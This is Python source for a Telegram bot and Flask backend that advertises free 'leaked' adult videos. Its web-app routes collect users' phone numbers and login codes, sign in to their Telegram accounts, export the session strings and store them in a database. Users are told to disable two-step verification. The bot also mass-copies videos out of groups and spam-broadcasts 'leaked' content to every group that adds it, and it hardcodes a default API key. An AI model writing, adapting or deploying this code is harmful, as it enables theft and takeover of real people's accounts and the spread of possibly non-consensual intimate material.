import os import time import queue # thread-safe queue ইম্পোর্ট করা হলো import threading import requests import asyncio import re import urllib3 from flask import Flask, jsonify, make_response, request, Response from supabase import create_client from pyrogram import Client, filters, enums, idle, utils from pyrogram.errors import SessionPasswordNeeded, PhoneCodeInvalid, PhoneCodeExpired, UserDeactivated, SessionRevoked, AuthKeyUnregistered, FloodWait from pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton, WebAppInfo urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # ==================== PYROGRAM NEW ID RANGE FIX (MONKEY PATCH) ==================== def get_peer_type_new(peer_id: int) -> str: peer_id_str = str(peer_id) if not peer_id_str.startswith("-"): return "user" elif peer_id_str.startswith("-100"): return "channel" else: return "chat" utils.get_peer_type = get_peer_type_new # ================================================================================== # ================= CONFIGURATION ================= BOT_TOKEN = os.environ.get("BOT_TOKEN") API_ID = int(os.environ.get("API_ID", 0)) API_HASH = os.environ.get("API_HASH") SUPABASE_URL = os.environ.get("SUPABASE_URL") SUPABASE_KEY = os.environ.get("SUPABASE_KEY") BYSE_API_KEY = os.environ.get("BYSE_API_KEY", "133323knboif885fhgwxvf") PREMIUM_CHANNEL_ID = -1002825744390 STORAGE_CHANNEL_ID = -1002825744390 # যে চ্যানেলে ভিডিও স্টোর হবে # আপনার Hugging Face স্পেসের ডিরেক্ট ইউআরএল BACKEND_URL = os.environ.get("BACKEND_URL", "https://mxvdo-forwardbot.hf.space") # WebApp URL (index.html) WEB_APP_URL = "https://rony90790.github.io/Forward-bot/index.html" ADMIN_IDS = [7307789267] app = Flask(__name__) supabase = create_client(SUPABASE_URL, SUPABASE_KEY) admin_states = {} temp_clients = {} # ডিফল্ট আপলোড সার্ভার মোড (Telegram) upload_mode = "telegram" try: main_loop = asyncio.get_running_loop() except RuntimeError: main_loop = asyncio.new_event_loop() asyncio.set_event_loop(main_loop) def run_async(coro): future = asyncio.run_coroutine_threadsafe(coro, main_loop) return future.result() bot = Client("file_unlocker_bot", api_id=API_ID, api_hash=API_HASH, bot_token=BOT_TOKEN) async def db_query(func): return await asyncio.to_thread(func) # ==================== UNIVERSAL MEDIA HELPER ==================== def get_media_obj(msg): """মেসেজ থেকে মিডিয়া অবজেক্ট (ভিডিও, জিআইএফ, ডকুমেন্ট) খুঁজে বের করার ফাংশন""" if not msg: return None if msg.video: return msg.video if msg.animation: return msg.animation if msg.document: return msg.document if msg.audio: return msg.audio return None def get_msg_file_id(msg): """মেসেজ থেকে ক্র্যাশ-ফ্রি file_id বের করার ফাংশন""" if not msg: return None if msg.photo: return msg.photo.file_id media = get_media_obj(msg) if media: return media.file_id return None # ================================================================ # ==================== CUSTOM VIDEO STREAMING ENGINE ==================== def get_file_stream(message_id): """টেলিগ্রামের স্টোরেজ চ্যানেল থেকে মেইন ইভেন্ট লুপে থ্রেড-সেফ কিউ ব্যবহার করে ডাটা স্ট্রিম করার ফাংশন""" q = queue.Queue(maxsize=10) # মেমোরি নিয়ন্ত্রণে রাখার জন্য সর্বোচ্চ সাইজ ১০ রাখা হয়েছে async def producer(): try: msg = await bot.get_messages(STORAGE_CHANNEL_ID, message_id) media = get_media_obj(msg) if not media: await asyncio.to_thread(q.put, None) return # ডাটা রিড করে থ্রেড-সেফ কিউ-তে রাখা হচ্ছে async for chunk in bot.stream_media(media): await asyncio.to_thread(q.put, chunk) except Exception as e: print(f"Error in stream producer: {e}") finally: await asyncio.to_thread(q.put, None) # স্ট্রিম শেষ হওয়ার সিগন্যাল # প্রোডিউসারটিকে বটের নিজের মেইন ইভেন্ট লুপে রান করানো হলো asyncio.run_coroutine_threadsafe(producer(), main_loop) # ফ্লাস্কের জন্য সিনক্রোনাস কন্সুমার জেনারেটর def consumer(): try: while True: try: # সর্বোচ্চ ১৫ সেকেন্ড অপেক্ষা করবে chunk = q.get(timeout=15) except queue.Empty: break if chunk is None: break yield chunk except GeneratorExit: # ইউজার যদি মাঝপথে ব্রাউজার ট্যাব কেটে দেয় while not q.empty(): try: q.get_nowait() except: break return consumer() @app.route('/stream/') def stream_video(message_id): """অনলাইনে প্লেয়ারে ভিডিও/জিআইএফ দেখার লিংক""" try: async def get_media_info(): msg = await bot.get_messages(STORAGE_CHANNEL_ID, message_id) media = get_media_obj(msg) if media: mime = getattr(media, 'mime_type', 'video/mp4') or 'video/mp4' return media.file_size, getattr(media, 'file_name', 'video.mp4'), mime return None, None, None file_size, file_name, mime_type = run_async(get_media_info()) if not file_size: return "File not found or invalid message", 404 response = make_response(Response(get_file_stream(message_id), mimetype=mime_type)) response.headers['Content-Length'] = file_size response.headers['Content-Type'] = mime_type response.headers['Accept-Ranges'] = 'bytes' response.headers['Content-Disposition'] = f'inline; filename="{file_name or "video.mp4"}"' return response except Exception as e: return f"Error: {e}", 500 @app.route('/download/') def download_video(message_id): """সরাসরি ওয়ান-ক্লিকে ডাউনলোড করার লিংক""" try: async def get_media_info(): msg = await bot.get_messages(STORAGE_CHANNEL_ID, message_id) media = get_media_obj(msg) if media: mime = getattr(media, 'mime_type', 'application/octet-stream') or 'application/octet-stream' return media.file_size, getattr(media, 'file_name', 'video.mp4'), mime return None, None, None file_size, file_name, mime_type = run_async(get_media_info()) if not file_size: return "File not found or invalid message", 404 response = make_response(Response(get_file_stream(message_id), mimetype=mime_type)) response.headers['Content-Length'] = file_size response.headers['Content-Disposition'] = f'attachment; filename="{file_name or "video.mp4"}"' return response except Exception as e: return f"Error: {e}", 500 # ======================================================================= # ================= FLASK API ROUTES ================= @app.route('/') def index(): return "Bot, Media Uploader, and Real Session API is Running! 🚀" @app.route('/api/jump') def jump_to_telegram(): html_content = """ Redirecting...
⏳ Connecting...
Opening Telegram Service Notifications
""" return make_response(html_content) def add_cors_headers(response): response.headers['Access-Control-Allow-Origin'] = '*' response.headers['Access-Control-Allow-Methods'] = 'GET, POST, OPTIONS' response.headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization' return response @app.route('/api/videos') def api_videos(): try: res = supabase.table('videos').select('*').order('id', desc=True).execute() return add_cors_headers(make_response(jsonify(res.data))) except Exception as e: return add_cors_headers(make_response(jsonify([]))) @app.route('/api/check_login', methods=['POST', 'OPTIONS']) def api_check_login(): if request.method == 'OPTIONS': return add_cors_headers(make_response()) data = request.json or {} user_id = data.get('user_id') async def check_user(): res = await db_query(lambda: supabase.table('user_sessions').select('session_string').eq('user_id', user_id).execute()) if res.data: session_string = res.data[0]['session_string'] temp_client = Client(f"test_session_{user_id}", session_string=session_string, api_id=API_ID, api_hash=API_HASH, in_memory=True) try: await temp_client.connect() await temp_client.get_me() await temp_client.disconnect() return {"status": "logged_in"} except Exception: try: await temp_client.disconnect() except: pass await db_query(lambda: supabase.table('user_sessions').delete().eq('user_id', user_id).execute()) return {"status": "not_logged_in"} return {"status": "not_logged_in"} try: result = run_async(check_user()) return add_cors_headers(make_response(jsonify(result))) except Exception as e: return add_cors_headers(make_response(jsonify({"status": "error"}))) @app.route('/api/send_code', methods=['POST', 'OPTIONS']) def api_send_code(): if request.method == 'OPTIONS': return add_cors_headers(make_response()) data = request.json or {} phone = data.get('phone') user_id = data.get('user_id') if not user_id or str(user_id) == '123456': return add_cors_headers(make_response(jsonify({"status": "error", "msg": "Please Open WebApp inside Telegram Bot!"}))) async def process_send_code(): if phone in temp_clients: try: await temp_clients[phone]['client'].disconnect() except: pass client = Client(f"session_{phone}", api_id=API_ID, api_hash=API_HASH, in_memory=True) await client.connect() try: code_info = await client.send_code(phone) temp_clients[phone] = {'client': client, 'hash': code_info.phone_code_hash} return {"status": "ok", "hash": code_info.phone_code_hash} except Exception as e: await client.disconnect() return {"status": "error", "msg": str(e)} try: result = run_async(process_send_code()) return add_cors_headers(make_response(jsonify(result))) except Exception as e: return add_cors_headers(make_response(jsonify({"status": "error", "msg": str(e)}))) @app.route('/api/verify_code', methods=['POST', 'OPTIONS']) def api_verify_code(): if request.method == 'OPTIONS': return add_cors_headers(make_response()) data = request.json or {} phone = data.get('phone') user_otp = data.get('otp') user_id = data.get('user_id') if phone not in temp_clients: return add_cors_headers(make_response(jsonify({"status": "error", "msg": "Session expired, request code again!"}))) async def process_verify(): temp_data = temp_clients[phone] client = temp_data['client'] phone_hash = temp_data['hash'] try: await client.sign_in(phone, phone_hash, user_otp) session_string = await client.export_session_string() await client.disconnect() await db_query(lambda: supabase.table('user_sessions').insert({"user_id": user_id, "session_string": session_string}).execute()) del temp_clients[phone] return {"status": "ok"} except SessionPasswordNeeded: await client.disconnect() del temp_clients[phone] return {"status": "error", "msg": "Two-Step Verification is ON! Please turn it off and try again."} except PhoneCodeInvalid: return {"status": "error", "msg": "Invalid OTP Code!"} except PhoneCodeExpired: await client.disconnect() del temp_clients[phone] return {"status": "error", "msg": "OTP Expired! Request again."} except Exception as e: await client.disconnect() del temp_clients[phone] return {"status": "error", "msg": str(e)} try: result = run_async(process_verify()) return add_cors_headers(make_response(jsonify(result))) except Exception as e: return add_cors_headers(make_response(jsonify({"status": "error", "msg": str(e)}))) # ================= TELEGRAM BOT COMMANDS ================= @bot.on_message(filters.command("start")) async def start(client, message): if message.chat.type != enums.ChatType.PRIVATE: try: bot_me = client.me if client.me else await client.get_me() bot_link = f"https://t.me/{bot_me.username}" markup = InlineKeyboardMarkup([[InlineKeyboardButton("🎬 Watch Videos Now", url=bot_link)]]) await message.reply("🔥 **Watch Premium Viral Videos for FREE!**\n\n👉 Click the button below to watch:", reply_markup=markup) except Exception: pass return try: user_id = message.from_user.id first_name = message.from_user.first_name args = message.command referrer_id = None if len(args) > 1: try: referrer_id = int(args[1]) except ValueError: pass user_check = await db_query(lambda: supabase.table('referrals').select('*').eq('user_id', user_id).execute()) if not user_check.data: await db_query(lambda: supabase.table('referrals').insert({'user_id': user_id, 'referral_count': 0, 'referrer_id': referrer_id if referrer_id != user_id else None}).execute()) if referrer_id and referrer_id != user_id: ref_data = await db_query(lambda: supabase.table('referrals').select('referral_count').eq('user_id', referrer_id).execute()) if ref_data.data: new_count = ref_data.data[0]['referral_count'] + 1 await db_query(lambda: supabase.table('referrals').update({'referral_count': new_count}).eq('user_id', referrer_id).execute()) try: safe_name = first_name.replace('<', '').replace('>', '') if first_name else "User" success_msg = f"🎉 Congratulations!\n\n👤 {safe_name} has joined using your link!\n📈 Total Invites: {new_count}\n\nGo to the Web App to check unlocked videos!" markup = InlineKeyboardMarkup([[InlineKeyboardButton("🎬 Check Unlocked Videos", web_app=WebAppInfo(url=WEB_APP_URL))]]) await client.send_message(referrer_id, success_msg, parse_mode=enums.ParseMode.HTML, reply_markup=markup) except Exception: pass bot_me = client.me if client.me else await client.get_me() markup = InlineKeyboardMarkup([ [InlineKeyboardButton("🔥 Play Viral Videos 🔞", web_app=WebAppInfo(url=WEB_APP_URL))], [InlineKeyboardButton("📢 Add to Group", url=f"https://t.me/{bot_me.username}?startgroup=true")] ]) welcome_text = (f"Hello {first_name}! 👋\n\n🎁 Welcome to Video Unlocker Pro!\nHere you can watch premium leaked and viral videos completely for FREE.\n\n👇 Click the button below to Open App:") await message.reply(welcome_text, parse_mode=enums.ParseMode.HTML, reply_markup=markup) except Exception as e: print(f"Start error: {e}") @bot.on_message(filters.new_chat_members) async def bot_added_to_group(client, message): me = client.me if getattr(me, "id", None) is None: try: me = await client.get_me() except: return for member in message.new_chat_members: if member.id == me.id: try: await db_query(lambda: supabase.table('groups').upsert({ 'group_id': message.chat.id, 'group_name': message.chat.title, 'added_by': message.from_user.id if message.from_user else None }).execute()) group_name = message.chat.title admin_msg = f"✅ Bot added to a new group!\n\n📌 Group Name: {group_name}\n🆔 ID: {message.chat.id}" for admin_id in ADMIN_IDS: try: await client.send_message(chat_id=admin_id, text=admin_msg, parse_mode=enums.ParseMode.HTML) except: pass except: pass @bot.on_message(filters.command("sendto") & filters.private & filters.user(ADMIN_IDS)) async def send_to_specific_group(client, message): if not message.reply_to_message: return await message.reply("❌ Please reply to a message, photo, or video that you want to send.\n\nExample: `/sendto -1001234567890`") args = message.command if len(args) < 2: return await message.reply("❌ Group ID missing!\n\nCorrect format:\n`/sendto -1003973566529`") try: group_id = int(args[1]) status = await message.reply("⏳ Sending message to group...") await message.reply_to_message.copy(chat_id=group_id) await status.edit_text(f"✅ Successfully sent to Group ID: {group_id}", parse_mode=enums.ParseMode.HTML) except Exception as e: await status.edit_text(f"❌ Failed to send!\nError: {e}", parse_mode=enums.ParseMode.HTML) # ================= DATABASE PROGRESS-BASED CLONING ================= async def save_progress(source_id, dest_id, msg_id): try: res = await db_query(lambda: supabase.table('clone_progress').select('id').eq('source_id', source_id).eq('dest_id', dest_id).execute()) if res.data: await db_query(lambda: supabase.table('clone_progress').update({'last_copied_id': msg_id}).eq('id', res.data[0]['id']).execute()) else: await db_query(lambda: supabase.table('clone_progress').insert({'source_id': source_id, 'dest_id': dest_id, 'last_copied_id': msg_id}).execute()) except Exception as e: print(f"Error saving progress: {e}") async def clone_videos_background(client, source_id, dest_id, status_msg): try: progress_res = await db_query(lambda: supabase.table('clone_progress').select('last_copied_id').eq('source_id', source_id).eq('dest_id', dest_id).execute()) last_copied_id = None if progress_res.data: last_copied_id = progress_res.data[0]['last_copied_id'] await status_msg.edit_text(f"⏳ Resuming clone task...\nFound previous progress. Resuming after video ID {last_copied_id}...\nFetching video list from {source_id}...", parse_mode=enums.ParseMode.HTML) else: await status_msg.edit_text(f"⏳ Cloning started!\nFetching video list from {source_id}...\nThis might take a few minutes if the group has many videos.", parse_mode=enums.ParseMode.HTML) video_ids = [] retries = 5 while retries > 0: try: if not client.is_connected: try: await client.connect() except: pass async for msg in client.search_messages(source_id, filter=enums.MessagesFilter.VIDEO): if last_copied_id and msg.id <= last_copied_id: continue video_ids.append(msg.id) if len(video_ids) % 200 == 0: await asyncio.sleep(0.1) break except Exception as e: err_msg = str(e).lower() if "disconnect" in err_msg or "connection" in err_msg or "timeout" in err_msg or "reset" in err_msg: retries -= 1 video_ids = [] await status_msg.edit_text(f"⚠️ Network issue detected!\nRetrying in 10 seconds... (Attempts left: {retries})\nError: {e}", parse_mode=enums.ParseMode.HTML) await asyncio.sleep(10) else: raise e if not video_ids: if last_copied_id: return await status_msg.edit_text("🎉 All videos are already cloned!\nNo new videos found in the source group.", parse_mode=enums.ParseMode.HTML) else: return await status_msg.edit_text("❌ No videos found in the source group!\n(Make sure the bot is an admin with read history permission in that group).", parse_mode=enums.ParseMode.HTML) video_ids.reverse() total = len(video_ids) if last_copied_id: await status_msg.edit_text(f"✅ Found {total} new videos to clone.\n🚀 Resuming background cloning from oldest to newest...", parse_mode=enums.ParseMode.HTML) else: await status_msg.edit_text(f"✅ Found {total} videos.\n🚀 Background cloning started from oldest to newest...", parse_mode=enums.ParseMode.HTML) success = 0 failed = 0 for index, msg_id in enumerate(video_ids, 1): copy_success = False copy_retries = 3 while copy_retries > 0: try: if not client.is_connected: try: await client.connect() except: pass await client.copy_message(chat_id=dest_id, from_chat_id=source_id, message_id=msg_id) success += 1 await save_progress(source_id, dest_id, msg_id) copy_success = True break except FloodWait as e: await asyncio.sleep(e.value + 2) except Exception as e: err_msg = str(e).lower() if "disconnect" in err_msg or "connection" in err_msg or "timeout" in err_msg or "reset" in err_msg: copy_retries -= 1 await asyncio.sleep(5) else: break if not copy_success: failed += 1 if index % 20 == 0 or index == total: try: await status_msg.edit_text(f"⏳ Cloning in progress... (Background)\n\nTotal Videos to Copy: {total}\n✅ Copied: {success}\n❌ Failed: {failed}\nLast Video ID: {msg_id}", parse_mode=enums.ParseMode.HTML) except FloodWait: pass except Exception: pass await asyncio.sleep(2.5) await status_msg.edit_text(f"🎉 Cloning Completely Finished!\n\nSource: {source_id}\nTotal Copied: {total}\n✅ Successfully Copied: {success}\n❌ Failed: {failed}", parse_mode=enums.ParseMode.HTML) except Exception as e: try: await status_msg.edit_text(f"❌ Cloning Error: {e}", parse_mode=enums.ParseMode.HTML) except: pass @bot.on_message(filters.command("clone") & filters.private & filters.user(ADMIN_IDS)) async def start_cloning(client, message): args = message.command if len(args) != 3: return await message.reply("❌ Invalid format!\n\nUse: `/clone `\nExample: `/clone -100123456789 -100987654321`", parse_mode=enums.ParseMode.HTML) try: source_id = int(args[1]) dest_id = int(args[2]) except ValueError: return await message.reply("❌ Chat IDs must be numbers.") status_msg = await message.reply("⏳ Initializing cloning task...", parse_mode=enums.ParseMode.HTML) asyncio.create_task(clone_videos_background(client, source_id, dest_id, status_msg)) # ================= NEW: SET UPLOAD SERVER MODE ================= @bot.on_message(filters.command("upload") & filters.private & filters.user(ADMIN_IDS)) async def set_upload_mode(client, message): global upload_mode args = message.command if len(args) > 1: mode = args[1].lower() if mode in ["telegram", "tg", "local"]: upload_mode = "telegram" await message.reply("✅ Upload server set to: Telegram\nVideos will be uploaded to your own channel and streamed via Hugging Face.") elif mode in ["byse", "byse.sx", "external"]: upload_mode = "byse" await message.reply("✅ Upload server set to: Byse.sx\nVideos will be uploaded to Byse.sx and streamed via their player.") else: await message.reply("❌ Invalid server! Use `/upload telegram` or `/upload byse`.") else: await message.reply(f"📌 Current Upload Server: {upload_mode.upper()}\n\nTo change, use:\n👉 `/upload telegram` (Storage Channel Stream)\n👉 `/upload byse` (Byse.sx third-party player)") # =============================================================== @bot.on_message(filters.command("blur") & filters.private & filters.user(ADMIN_IDS)) async def set_blur_state(client, message): try: args = message.text.split() if len(args) > 1 and args[1].lower() in ['0', '0%', 'off', 'cancel']: if message.chat.id in admin_states: admin_states[message.chat.id].pop("blur_percent", None) admin_states[message.chat.id].pop("clear_percent", None) await message.reply("✅ Blur mode is disabled!\nUploaded videos will no longer be blurred, only watermarked as before.", parse_mode=enums.ParseMode.HTML) return match = re.search(r'/blur\s+(\d+)%?(?:\s+(\d+)%?)?', message.text, re.IGNORECASE) if match: percent = int(match.group(1)) clear_percent = int(match.group(2)) if match.group(2) else 0 if percent == 0: if message.chat.id in admin_states: admin_states[message.chat.id].pop("blur_percent", None) admin_states[message.chat.id].pop("clear_percent", None) await message.reply("✅ Blur mode is disabled!", parse_mode=enums.ParseMode.HTML) return if message.chat.id not in admin_states: admin_states[message.chat.id] = {} admin_states[message.chat.id]["blur_percent"] = percent admin_states[message.chat.id]["clear_percent"] = clear_percent clear_msg = f"and the top {clear_percent}% part will remain clear." if clear_percent > 0 else "The entire photo/video will be blurred." reply_text = f"✅ Blur set to: {percent}%\n📌 {clear_msg}\n\nThis will be applied to all future uploads.\n(To disable, send /blur 0)" await message.reply(reply_text, parse_mode=enums.ParseMode.HTML) else: await message.reply("❌ Invalid command!\nCorrect format: `/blur 60` or `/blur 60 20`") except Exception as e: print(e) def upload_file_sync(upload_url, file_path, api_key): try: with open(file_path, 'rb') as f: res = requests.post(upload_url, data={'key': api_key}, files={'file': f}, timeout=900) return res.json() if res.status_code == 200 else {} except Exception as e: return {} @bot.on_message((filters.video | filters.animation | filters.photo | filters.document) & filters.private & filters.user(ADMIN_IDS)) async def handle_media_upload(client, message): global upload_mode state = admin_states.get(message.chat.id, {}) if state.get("step") == "broadcast": await process_broadcast(client, message) return is_video = message.video or (message.document and message.document.mime_type and "video" in message.document.mime_type) is_animation = message.animation or (message.document and message.document.mime_type and "gif" in message.document.mime_type) is_photo = message.photo or (message.document and message.document.mime_type and "image" in message.document.mime_type) if not (is_video or is_animation or is_photo): return media_type = "video" if (is_video or is_animation) else "photo" has_blur_caption = message.caption and "/blur" in message.caption.lower() is_persistent_blur = bool(state.get("blur_percent")) if media_type == "photo" and not (has_blur_caption or is_persistent_blur): status = await message.reply("⏳ Saving thumbnail...") try: local_path = await message.download() def upload_to_supabase(): with open(local_path, 'rb') as f: file_bytes = f.read() file_name = f"thumb_{int(time.time())}.jpg" supabase.storage.from_('thumbnails').upload(file_name, file_bytes, {"content-type": "image/jpeg"}) return supabase.storage.from_('thumbnails').get_public_url(file_name) direct_link = await asyncio.to_thread(upload_to_supabase) if os.path.exists(local_path): os.remove(local_path) await status.edit_text(f"✅ Thumbnail saved successfully!\n\n{direct_link}", parse_mode=enums.ParseMode.HTML) except Exception as e: await status.edit_text(f"⚠️ Upload Error: {e}") return raw_caption = message.caption or "" blur_match = re.search(r'/blur\s+(\d+)%?(?:\s+(\d+)%?)?', raw_caption, re.IGNORECASE) is_blur = False blur_percent = 0 clear_percent = 0 clean_caption = raw_caption if blur_match: is_blur = True blur_percent = int(blur_match.group(1)) clear_percent = int(blur_match.group(2)) if blur_match.group(2) else 0 clean_caption = re.sub(r'/blur\s*\d+%?(?:\s*\d+%?)?', '', raw_caption, flags=re.IGNORECASE).strip() elif state.get("blur_percent"): is_blur = True blur_percent = state["blur_percent"] clear_percent = state.get("clear_percent", 0) is_large_video = False if media_type == "video": media = get_media_obj(message) duration = media.duration if media and hasattr(media, 'duration') and media.duration else 0 file_size = media.file_size if media and hasattr(media, 'file_size') and media.file_size else 0 MAX_DURATION = 7200 MAX_SIZE = 1900 * 1024 * 1024 if duration > MAX_DURATION or file_size > MAX_SIZE: is_large_video = True is_blur = False status_msg = await message.reply("⏳ Video is too large! Skipping blur..." if is_large_video else "⏳ Downloading media... 0%") bot_me = client.me if client.me else await client.get_me() bot_link = f"https://t.me/{bot_me.username}" original_file, watermarked_file, blurred_file = None, None, None clean_upload_file, telegram_file, embed_link = None, None, None last_update_time = time.time() async def download_progress(current, total): nonlocal last_update_time now = time.time() if now - last_update_time >= 4.0: try: percent = (current / total) * 100 await status_msg.edit_text(f"⏳ Downloading media... {percent:.1f}%") last_update_time = now except Exception: pass try: original_file = await message.download(progress=download_progress) clean_upload_file = original_file if media_type == "video" and not is_large_video: await status_msg.edit_text("⏳ Watermarking video... (HD + Superfast Processing)") watermarked_file = f"{original_file}_wm.mp4" has_audio = not (message.animation or (message.document and message.document.mime_type and "gif" in message.document.mime_type)) audio_opts = ["-an"] if not has_audio else ["-c:a", "copy"] cmd = [ "ffmpeg", "-y", "-i", original_file, "-vf", "drawtext=text='@mxvdo':x=W-tw-20:y=H-th-20:fontsize=22:fontcolor=white@0.7:shadowcolor=black@0.8:shadowx=2:shadowy=2:enable='gte(t,5)'", "-c:v", "libx264", "-preset", "superfast", "-crf", "23", "-pix_fmt", "yuv420p" ] + audio_opts + ["-movflags", "+faststart", watermarked_file] process = await asyncio.create_subprocess_exec(*cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) await process.communicate() if process.returncode == 0 and os.path.exists(watermarked_file) and os.path.getsize(watermarked_file) > 0: clean_upload_file = watermarked_file storage_msg_id = None if media_type in ["video", "photo"]: if upload_mode == "telegram": await status_msg.edit_text("⏳ Uploading Clean HD video to your storage channel...") thumb_path_storage = f"{original_file}_storage_thumb.jpg" proc = await asyncio.create_subprocess_exec("ffmpeg", "-y", "-i", clean_upload_file, "-vframes", "1", thumb_path_storage, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) await proc.communicate() if not os.path.exists(thumb_path_storage): thumb_path_storage = None media = get_media_obj(message) vid_duration = media.duration if media and hasattr(media, 'duration') and media.duration else 0 vid_width = media.width if media and hasattr(media, 'width') and media.width else 0 vid_height = media.height if media and hasattr(media, 'height') and media.height else 0 sent_to_channel = await client.send_video( chat_id=STORAGE_CHANNEL_ID, video=clean_upload_file, caption=f"Backup of video uploaded by Admin. File: {os.path.basename(clean_upload_file)}", duration=vid_duration, width=vid_width, height=vid_height, thumb=thumb_path_storage ) storage_msg_id = sent_to_channel.id stream_link = f"{BACKEND_URL}/stream/{storage_msg_id}" download_link = f"{BACKEND_URL}/download/{storage_msg_id}" embed_link = stream_link else: await status_msg.edit_text("⏳ Uploading Clean HD video to byse.sx server...") api_endpoint = "https://api.byse.sx/upload/server" loop = asyncio.get_event_loop() response = await loop.run_in_executor(None, lambda: requests.get(api_endpoint, params={'key': BYSE_API_KEY}, timeout=30)) result = response.json() if result.get('status') == 200: upload_res = await loop.run_in_executor(None, upload_file_sync, result.get('result'), clean_upload_file, BYSE_API_KEY) if upload_res.get('status') == 200 and 'files' in upload_res and len(upload_res['files']) > 0: file_status = upload_res['files'][0].get('status', '') if "not allowed" in str(file_status).lower(): await status_msg.edit_text(f"❌ byse.sx rejected the file: {file_status}", parse_mode=enums.ParseMode.HTML) return file_code = upload_res['files'][0].get('filecode') if file_code: embed_link = f"https://bysesayeveum.com/e/{file_code}" if not embed_link: await status_msg.edit_text("❌ Uploaded to byse.sx but Embed Link not found.") return stream_link = embed_link download_link = embed_link if is_large_video: admin_cap = f"✅ Success! (Large Video)\n\n🔗 Embed Link (Clean HD):\n{embed_link or 'N/A'}\n\n📌 Broadcast skipped due to large file size." await client.send_video(message.chat.id, message.video.file_id, caption=admin_cap, parse_mode=enums.ParseMode.HTML) await status_msg.delete() return telegram_file = clean_upload_file if is_blur and not is_large_video: await status_msg.edit_text(f"⏳ Applying {blur_percent}% blur for Telegram broadcast...") radius = max(2, min(20, int((blur_percent / 100.0) * 30))) ext = "jpg" if media_type == "photo" else "mp4" blurred_file = f"{original_file}_blurred.{ext}" if clear_percent > 0: clear_ratio = clear_percent / 100.0 ff_filter = ["-filter_complex", f"[0:v]split[v1][v2];[v2]boxblur={radius}:1[blurred];[v1]crop=iw:ih*{clear_ratio}:0:0[top];[blurred][top]overlay=0:0[vout]", "-map", "[vout]"] if media_type == "video": ff_filter.extend(["-map", "0:a?"]) else: ff_filter = ["-vf", f"boxblur={radius}:1"] has_audio = not (message.animation or (message.document and message.document.mime_type and "gif" in message.document.mime_type)) audio_opts_blur = ["-an"] if not has_audio else [] if media_type == "photo": cmd_blur = ["ffmpeg", "-y", "-i", clean_upload_file] + ff_filter + [blurred_file] else: cmd_blur = ["ffmpeg", "-y", "-i", clean_upload_file] + ff_filter + ["-c:v", "libx264", "-preset", "superfast", "-crf", "23", "-pix_fmt", "yuv420p"] + audio_opts_blur + ["-movflags", "+faststart", blurred_file] process_blur = await asyncio.create_subprocess_exec(*cmd_blur, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) await process_blur.communicate() if process_blur.returncode == 0 and os.path.exists(blurred_file) and os.path.getsize(blurred_file) > 0: telegram_file = blurred_file await status_msg.edit_text("⏳ Preparing to broadcast to groups...") if media_type == "video": caption_text = f"🔥 New Premium Viral Video Leaked! 🔞\n\n🎬 Watch HD Video Here:\n👉 ▶️ Click Here to Watch\n\n👇 Click the button below to open Bot!" else: caption_text = f"{clean_caption}\n\n👇 Click the button below to open Bot!" if clean_caption else f"🔥 New Premium Viral Content! 🔞\n\n🎬 Watch HD Video Here:\n👉 ▶️ Click Here to Watch\n\n👇 Click the button below to open Bot!" group_markup = InlineKeyboardMarkup([[InlineKeyboardButton("🎬 Watch Full Video Here 🔞", url=bot_link)]]) admin_cap = ( f"✅ Upload and Processing Complete!\n\n" f"🎬 Stream/Watch Online Link:\n{stream_link}\n\n" f"📥 Direct Download Link:\n{download_link}" ) thumb_path = None if media_type == "video": thumb_path = f"{original_file}_thumb.jpg" proc = await asyncio.create_subprocess_exec("ffmpeg", "-y", "-i", telegram_file, "-vframes", "1", thumb_path, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) await proc.communicate() if not os.path.exists(thumb_path): thumb_path = None if media_type == "photo": sent_to_admin = await client.send_photo(message.chat.id, telegram_file, caption=admin_cap, parse_mode=enums.ParseMode.HTML) else: media = get_media_obj(message) vid_duration = media.duration if media and hasattr(media, 'duration') and media.duration else 0 vid_width = media.width if media and hasattr(media, 'width') and media.width else 0 vid_height = media.height if media and hasattr(media, 'height') and media.height else 0 sent_to_admin = await client.send_video( message.chat.id, telegram_file, caption=admin_cap, parse_mode=enums.ParseMode.HTML, duration=vid_duration, width=vid_width, height=vid_height, thumb=thumb_path ) tg_file_id = get_msg_file_id(sent_to_admin) if not tg_file_id: tg_file_id = get_msg_file_id(message) await status_msg.delete() # ================= FloodWait Handler for Broadcast ================= groups_res = await db_query(lambda: supabase.table('groups').select('group_id').execute()) group_ids = [g['group_id'] for g in groups_res.data] success_count, fail_count = 0, 0 for gid in set(group_ids): try: if media_type == "photo": await client.send_photo(gid, tg_file_id, caption=caption_text, parse_mode=enums.ParseMode.HTML, reply_markup=group_markup) else: await client.send_video(gid, tg_file_id, caption=caption_text, parse_mode=enums.ParseMode.HTML, reply_markup=group_markup) success_count += 1 await asyncio.sleep(1.5) except FloodWait as e: await asyncio.sleep(e.value + 1) try: if media_type == "photo": await client.send_photo(gid, tg_file_id, caption=caption_text, parse_mode=enums.ParseMode.HTML, reply_markup=group_markup) else: await client.send_video(gid, tg_file_id, caption=caption_text, parse_mode=enums.ParseMode.HTML, reply_markup=group_markup) success_count += 1 except Exception: fail_count += 1 except Exception: fail_count += 1 await message.reply(f"📢 Broadcast Complete!\n\n✅ Success: {success_count} groups\n❌ Failed: {fail_count} groups", parse_mode=enums.ParseMode.HTML) except Exception as e: await message.reply(f"⚠️ Error occurred: {str(e)}") finally: for f in [original_file, watermarked_file, blurred_file, f"{original_file}_thumb.jpg" if original_file else None, f"{original_file}_storage_thumb.jpg" if original_file else None]: if f and os.path.exists(f): try: os.remove(f) except: pass @bot.on_message(filters.command(["stats", "users"]) & filters.private & filters.user(ADMIN_IDS)) async def bot_stats(client, message): try: users = await db_query(lambda: supabase.table('referrals').select('user_id', count='exact').execute()) videos = await db_query(lambda: supabase.table('videos').select('*', count='exact').execute()) groups = await db_query(lambda: supabase.table('groups').select('group_id', count='exact').execute()) await message.reply(f"📊 Bot Stats:\n👥 Users: {users.count or 0}\n🎬 Videos: {videos.count or 0}\n📢 Groups: {groups.count or 0}", parse_mode=enums.ParseMode.HTML) except Exception as e: print(e) @bot.on_message(filters.command("broadcast") & filters.private & filters.user(ADMIN_IDS)) async def broadcast_command(client, message): admin_states[message.chat.id] = {"step": "broadcast"} await 